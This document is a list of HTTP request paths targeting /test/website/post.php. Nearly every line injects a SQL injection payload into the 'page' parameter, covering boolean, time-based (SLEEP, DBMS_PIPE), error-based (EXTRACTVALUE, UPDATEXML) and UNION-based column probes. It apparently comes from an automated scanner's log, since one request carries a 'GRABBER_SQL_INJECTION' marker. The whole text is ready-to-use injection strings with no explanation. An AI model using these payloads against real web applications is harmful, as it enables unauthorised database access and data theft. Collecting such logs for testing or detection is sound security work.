/test/website/post.php?page=1%22%3BSELECT%20SLEEP%285%29%23
/test/website/post.php?page=(SELECT (CASE WHEN (5436=5436) THEN 5436 ELSE 5436*(SELECT 5436 FROM mysql.db) END))
/test/website/post.php?page=-9760"))) UNION ALL SELECT 8857,8857,8857-- uVej
/test/website/post.php?page=1"))) AND (7841=8695)*8695 AND ((("Frru"="Frru
/test/website/post.php?page=1' ORDER BY 1-- BaMB
/test/website/post.php?page=1%29%29%20AS%20atYF%20WHERE%205392%3D5392%3BSELECT%20%28CASE%20WHEN%20%287474%3D7474%29%20THEN%207474%20ELSE%207474%2A%28SELECT%207474%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%23
/test/website/post.php?page=1") AS aroD WHERE 6902=6902;SELECT (CASE WHEN (7474=7474) THEN 7474 ELSE 7474*(SELECT 7474 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)#
/test/website/post.php?page=-7212"))) UNION ALL SELECT 7660,7660,7660,7660-- kaIf
/test/website/post.php?page=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Ryrn
/test/website/post.php?page=1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20ovRw
/test/website/post.php?page=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20aHCM
/test/website/post.php?page=1%27%20AND%20SLEEP%285%29%20AND%20%27bgCG%27%3D%27bgCG
/test/website/post.php?page=1")) AND ELT(8416=8416,SLEEP(5)) AND (("aYNk"="aYNk
/test/website/post.php?page=1';SELECT SLEEP(5) AND 'MHQn'='MHQn
/test/website/post.php?page=1%25%22%3BSELECT%20%28CASE%20WHEN%20%281034%3D1034%29%20THEN%201034%20ELSE%201034%2A%28SELECT%201034%20FROM%20mysql.db%29%20END%29%23
/test/website/post.php?page=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- HqZL
/test/website/post.php?page=1') RLIKE (SELECT * FROM (SELECT(SLEEP(5)))qVYX)-- oQeM
/test/website/post.php?page=1')) AND (6571=2579)*2579 AND (('kiDJ' LIKE 'kiDJ
/test/website/post.php?page=1%29%20AND%204939%3D9888--%20TMsz
/test/website/post.php?page=1%29%3BSELECT%20SLEEP%285%29%23
/test/website/post.php?page=1%20WHERE%205864%3D5864%20AND%20SLEEP%285%29%23
/test/website/post.php?page=1" AND 2381=7457-- mOTl
/test/website/post.php?page=1%27%29%29%29%20AND%209608%3D4551--%20nVeF
/test/website/post.php?page=1 WHERE 2172=2172 AND 7697=7697-- SkZJ
/test/website/post.php?page=1) AND SLEEP(5)-- fwot
/test/website/post.php?page=1%27%29%20WHERE%207969%3D7969%20AND%208542%3D7634--%20OVBa
/test/website/post.php?page=1%29%29%29%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ppSD%29%23
/test/website/post.php?page=1%"));(SELECT * FROM (SELECT(SLEEP(5)))GZlk) AND (("%"="
/test/website/post.php?page=1) AS NCFW WHERE 9830=9830 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hHEx
/test/website/post.php?page=1%25%27%20RLIKE%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29SLqO%29%23
/test/website/post.php?page=1%20UNION%20ALL%20SELECT%20NULL--%20HETc
/test/website/post.php?page=1%27%7C%7C%28SELECT%20%27ALcr%27%20WHERE%204538%3D4538%20AND%207697%3D7697%29%7C%7C%27
/test/website/post.php?page=-6420')) UNION ALL SELECT 1713,1713,1713,1713,1713,1713-- HKRw
/test/website/post.php?page=1%25%27%29%29%29%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GZlk%29%20AND%20%28%28%28%27%25%27%3D%27
/test/website/post.php?page=1 AND 3952=3952-- pJYj
/test/website/post.php?page=-3107) UNION ALL SELECT 9937,9937,9937,9937,9937,9937,9937-- jpOj
/test/website/post.php?page=1%22%29%29%29%20AND%20UPDATEXML%289183%2CCONCAT%280x2e%2C0x71767a6a71%2C%28SELECT%20%28ELT%289183%3D9183%2C1%29%29%29%2C0x7178787a71%29%2C4408%29%20AND%20%28%28%28%22CgkM%22%3D%22CgkM
/test/website/post.php?page=1%60%29%20WHERE%205914%3D5914%20AND%204570%3D4842%23
/test/website/post.php?page=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20cDTk
/test/website/post.php?page=1'||(SELECT 'JLyg' FROM DUAL WHERE 6991=6991 AND 7870=7870)||'
/test/website/post.php?page=1%29%29%20AS%20HunI%20WHERE%207197%3D7197%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%285882%3D5882%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29--%20GDcD
/test/website/post.php?page=1%27%29%20AND%205428%3D3691--%20TUTJ
/test/website/post.php?page=1%'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71767a6a71,(SELECT (ELT(8004=8004,1))),0x7178787a71)) USING utf8))) AND ((('%'='
/test/website/post.php?page=1%") AND 9467=9467-- XPLm
/test/website/post.php?page=-6718`) WHERE 3603=3603 UNION ALL SELECT 3603,3603,3603,3603,3603,3603,3603,3603,3603,3603,3603,3603,3603,3603,3603,3603,3603-- qDEA
/test/website/post.php?page=1%27%2B%28SELECT%20WJCM%20WHERE%203943%3D3943%20AND%204054%3D7726%29%2B%27
/test/website/post.php?page=-8615%22%29%20UNION%20ALL%20SELECT%207702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702--%20nEKT
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20asqJ
/test/website/post.php?page=1%22%29%20AND%20ROW%286887%2C7898%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%286887%3D6887%2C1%29%29%29%2C0x7178787a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209578%20UNION%20SELECT%204916%20UNION%20SELECT%206664%20UNION%20SELECT%206501%29a%20GROUP%20BY%20x%29%20AND%20%28%22HTku%22%20LIKE%20%22HTku
/test/website/post.php?page=1%27%29%29%20AS%20tdzx%20WHERE%204745%3D4745%20RLIKE%20SLEEP%285%29--%20aKiP
/test/website/post.php?page=1%29%20WHERE%201684%3D1684%20AND%20EXTRACTVALUE%289193%2CCONCAT%280x5c%2C0x71767a6a71%2C%28SELECT%20%28ELT%289193%3D9193%2C1%29%29%29%2C0x7178787a71%29%29--%20jyxu
/test/website/post.php?page=1") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KkRk
/test/website/post.php?page=1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KvWD
/test/website/post.php?page=1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20yzxv
/test/website/post.php?page=1%'))) AND 5786=4694-- Ntnt
/test/website/post.php?page=-2030%22%29%29%20UNION%20ALL%20SELECT%209131%2C9131%2C9131%2C9131%2C9131%2C9131--%20MVtS
/test/website/post.php?page=-4826" UNION ALL SELECT 2576,2576,2576,2576,2576,2576-- yTOl
/test/website/post.php?page=-7605%27%20UNION%20ALL%20SELECT%205172%2C5172%2C5172--%20oqxV
/test/website/post.php?page=-5858"))) UNION ALL SELECT 4922,4922,4922,4922,4922,4922,4922,4922,4922,4922,4922,4922-- UpuI
/test/website/post.php?page=1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20tPfA
/test/website/post.php?page=1%27%29%29%20AND%203119%3D9597%20AND%20%28%28%27hIpp%27%20LIKE%20%27hIpp
/test/website/post.php?page=1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20Mjzr
/test/website/post.php?page=1,(SELECT 7750 FROM(SELECT COUNT(*),CONCAT(0x71767a6a71,(SELECT (ELT(7750=7750,1))),0x7178787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
/test/website/post.php?page=1')) AS icAO WHERE 2205=2205 AND 9467=9467-- oSLc
/test/website/post.php?page=1%22%29%29%29%20AND%20EXTRACTVALUE%289193%2CCONCAT%280x5c%2C0x71767a6a71%2C%28SELECT%20%28ELT%289193%3D9193%2C1%29%29%29%2C0x7178787a71%29%29%20AND%20%28%28%28%22qULn%22%20LIKE%20%22qULn
/test/website/post.php?page=1%60%20WHERE%204747%3D4747%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20VyKT
/test/website/post.php?page=1')) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WRHe
/test/website/post.php?page=1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20gFVL
/test/website/post.php?page=1" UNION ALL SELECT NULL,NULL,NULL-- LJpS
/test/website/post.php?page=1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20cgpo
/test/website/post.php?page=1%25%22%20AND%20ELT%281147%3D5995%2C5995%29%20AND%20%22%25%22%3D%22
/test/website/post.php?page=%28CASE%20WHEN%20%282245%3D2245%29%20THEN%202245%20ELSE%202245%2A%28SELECT%202245%20FROM%20DUAL%20UNION%20SELECT%207833%20FROM%20DUAL%29%20END%29
/test/website/post.php?page=-5137%25%22%29%29%29%20UNION%20ALL%20SELECT%209594%2C9594%2C9594%2C9594%2C9594%2C9594%2C9594%2C9594%2C9594%2C9594%2C9594--%20EoJG
/test/website/post.php?page=1`) WHERE 9276=9276 AND MAKE_SET(2898=2898,8166)-- Vopr
/test/website/post.php?page=1%20AND%20EXTRACTVALUE%289193%2CCONCAT%280x5c%2C0x71767a6a71%2C%28SELECT%20%28ELT%289193%3D9193%2C1%29%29%29%2C0x7178787a71%29%29%23%20FCxv
/test/website/post.php?page=-6372 UNION ALL SELECT 3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679,3679-- Sjxk
/test/website/post.php?page=-9968%" UNION ALL SELECT 7259,7259,7259,7259,7259,7259,7259,7259,7259,7259,7259,7259,7259,7259,7259,7259-- hWpT
/test/website/post.php?page=1%"))) RLIKE (SELECT * FROM (SELECT(SLEEP(5)))SLqO)#
/test/website/post.php?page=-8740%"))) UNION ALL SELECT 9676,9676,9676,9676,9676,9676,9676,9676,9676,9676,9676,9676,9676,9676,9676,9676,9676,9676-- swjV
/test/website/post.php?page=1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20JhDG
/test/website/post.php?page=1%22%29%29%29%20AND%209467%3D9467--%20uxCl
/test/website/post.php?page=1%'))) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- HFUM
/test/website/post.php?page=1%'))) AND (7543=2468)*2468 AND ((('%'='
/test/website/post.php?page=1%27%29%20AS%20GOCd%20WHERE%207363%3D7363%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%283978%3D1450%29%20THEN%201%20ELSE%200x28%20END%29%29--%20gpca
/test/website/post.php?page=-7202%22%29%29%29%20UNION%20ALL%20SELECT%203605%2C3605%2C3605%2C3605%2C3605%2C3605%2C3605%2C3605%2C3605--%20QvOZ
/test/website/post.php?page=1%60%20WHERE%201272%3D1272%20AND%20%285577%3D1966%29%2A1966--%20uiEn
/test/website/post.php?page=-3853%22%29%20UNION%20ALL%20SELECT%203278%2C3278%2C3278%2C3278%2C3278%2C3278%2C3278%2C3278--%20Puuo
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23
/test/website/post.php?page=-5242 UNION ALL SELECT 8379,8379,8379,8379,8379,8379,8379,8379,8379,8379,8379,8379,8379,8379,8379,8379,8379,8379,8379,8379-- FjTU
/test/website/post.php?page=1%29%29%20AS%20rUFT%20WHERE%201770%3D1770%20AND%20MAKE_SET%283641%3D5280%2C5280%29--%20RtHZ
/test/website/post.php?page=1%27%29%20AS%20uFXh%20WHERE%208015%3D8015%20ORDER%20BY%201--%20JPXu
/test/website/post.php?page=1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- FKdm
/test/website/post.php?page=1%22%29%29%20AND%207508%3D5682%20AND%20%28%28%22EZBN%22%3D%22EZBN
/test/website/post.php?page=1%" AND MAKE_SET(2898=2898,8166) AND "%"="
/test/website/post.php?page=1" AND 9467=9467-- hSEg
/test/website/index.php?username=1%27GRABBER_SQL_INJECTION&password=1%27GRABBER_SQL_INJECTION&name=1%27GRABBER_SQL_INJECTION&
/test/website/post.php?page=1%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GZlk%29%23%20oNud
/test/website/post.php?page=1%");SELECT (CASE WHEN (5819=6051) THEN 5819 ELSE 5819*(SELECT 5819 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)#
/test/website/post.php?page=1"))) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KxMC
/test/website/post.php?page=-2081')) AS ybKv WHERE 8860=8860 UNION ALL SELECT 8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860,8860-- MXCQ
/test/website/post.php?page=1") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- JZwP
/test/website/post.php?page=1' WHERE 2010=2010 AND 7870=7870-- RAQD
/test/website/post.php?page=1%")) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- JlDZ
/test/website/post.php?page=1%25%27%29%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%286105%2CCONCAT%280x5c%2C0x71767a6a71%2C%28SELECT%20%28CASE%20WHEN%20%286105%3D6105%29%20THEN%201%20ELSE%200%20END%29%29%2C0x7178787a71%29%29%2C1%29%20AND%20%28%27%25%27%3D%27
/test/website/post.php?page=-2949%29%29%29%20UNION%20ALL%20SELECT%201737%2C1737%2C1737%2C1737%2C1737%2C1737%2C1737%2C1737%2C1737%2C1737%2C1737%2C1737%2C1737%2C1737%2C1737--%20JGte
/test/website/post.php?page=1%27%29%29%20AS%20CYAg%20WHERE%207505%3D7505%20AND%20MAKE_SET%282898%3D2898%2C8166%29--%20EXqL
/test/website/post.php?page=1%") AND (SELECT 6282 FROM(SELECT COUNT(*),CONCAT(0x71767a6a71,(SELECT (ELT(6282=6282,1))),0x7178787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ("%"="
/test/website/post.php?page=1%25%27%3BSELECT%20%28CASE%20WHEN%20%282026%3D6956%29%20THEN%202026%20ELSE%202026%2A%28SELECT%202026%20FROM%20mysql.db%29%20END%29%23
/test/website/post.php?page=1%22%20AND%207697%3D7697%20AND%20%22ssFw%22%3D%22ssFw
/test/website/post.php?page=1%29%20WHERE%207281%3D7281%20RLIKE%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29qVYX%29--%20XEdk
/test/website/post.php?page=1%22%20AND%20UPDATEXML%289183%2CCONCAT%280x2e%2C0x71767a6a71%2C%28SELECT%20%28ELT%289183%3D9183%2C1%29%29%29%2C0x7178787a71%29%2C4408%29%20AND%20%22CviX%22%20LIKE%20%22CviX
/test/website/post.php?page=1);SELECT (CASE WHEN (6631=3172) THEN 6631 ELSE 6631*(SELECT 6631 FROM mysql.db) END)#
/test/website/post.php?page=1%27%29%29%29%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GZlk%29%20AND%20%28%28%28%27vUth%27%20LIKE%20%27vUth
/test/website/post.php?page=1) AS pSBG WHERE 4557=4557 AND ROW(6887,7898)>(SELECT COUNT(*),CONCAT(0x71767a6a71,(SELECT (ELT(6887=6887,1))),0x7178787a71,FLOOR(RAND(0)*2))x FROM (SELECT 9578 UNION SELECT 4916 UNION SELECT 6664 UNION SELECT 6501)a GROUP BY x)-- dKRT
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL--%20gyOT
/test/website/post.php?page=1' AND (6891=6891)*8884 AND 'Dsls'='Dsls
/test/website/post.php?page=1' UNION ALL SELECT NULL,NULL-- QSZy
/test/website/post.php?page=1%22%20WHERE%206805%3D6805%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29VxDZ%29--%20BfMN
/test/website/post.php?page=1') AND 4291=3098-- mXjH
/test/website/post.php?page=1');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(78)||CHR(78)||CHR(78),5) FROM DUAL--
/test/website/post.php?page=1%22%29%29%29%20AND%20ELT%283734%3D3734%2C7834%29%20AND%20%28%28%28%22rKxY%22%20LIKE%20%22rKxY
/test/website/post.php?page=1 AND 6804=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (6804=6804) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)
/test/website/post.php?page=1%")) UNION ALL SELECT NULL,NULL-- XhTj
/test/website/post.php?page=-3977%')) UNION ALL SELECT 7420,7420,7420,7420-- GAmd
/test/website/post.php?page=1') AS EzfG WHERE 7346=7346 AND ELT(3734=3734,7834)-- mDqI
/test/website/post.php?page=-2399%27%29%29%29%20UNION%20ALL%20SELECT%201907%2C1907%2C1907%2C1907--%20PsIT
/test/website/post.php?page=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20wagp
/test/website/post.php?page=1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- tPTZ
/test/website/post.php?page=1%22%29%29%20AS%20TufD%20WHERE%204375%3D4375%20AND%20ELT%283931%3D5511%2C5511%29--%20jSwj
/test/website/post.php?page=-1820 UNION ALL SELECT 2404,2404,2404,2404,2404-- Bfas
/test/website/post.php?page=-1045')) UNION ALL SELECT 1069,1069,1069,1069,1069,1069,1069,1069,1069,1069,1069,1069,1069,1069-- KiBb
/test/website/post.php?page=1%29%29%20AND%20MAKE_SET%281024%3D4260%2C4260%29%20AND%20%28%288155%3D8155
/test/website/post.php?page=1%25%27%29%29%29%20AND%20ELT%288416%3D8416%2CSLEEP%285%29%29%20AND%20%28%28%28%27%25%27%3D%27
/test/website/post.php?page=-7865') UNION ALL SELECT 2704,2704-- fAml
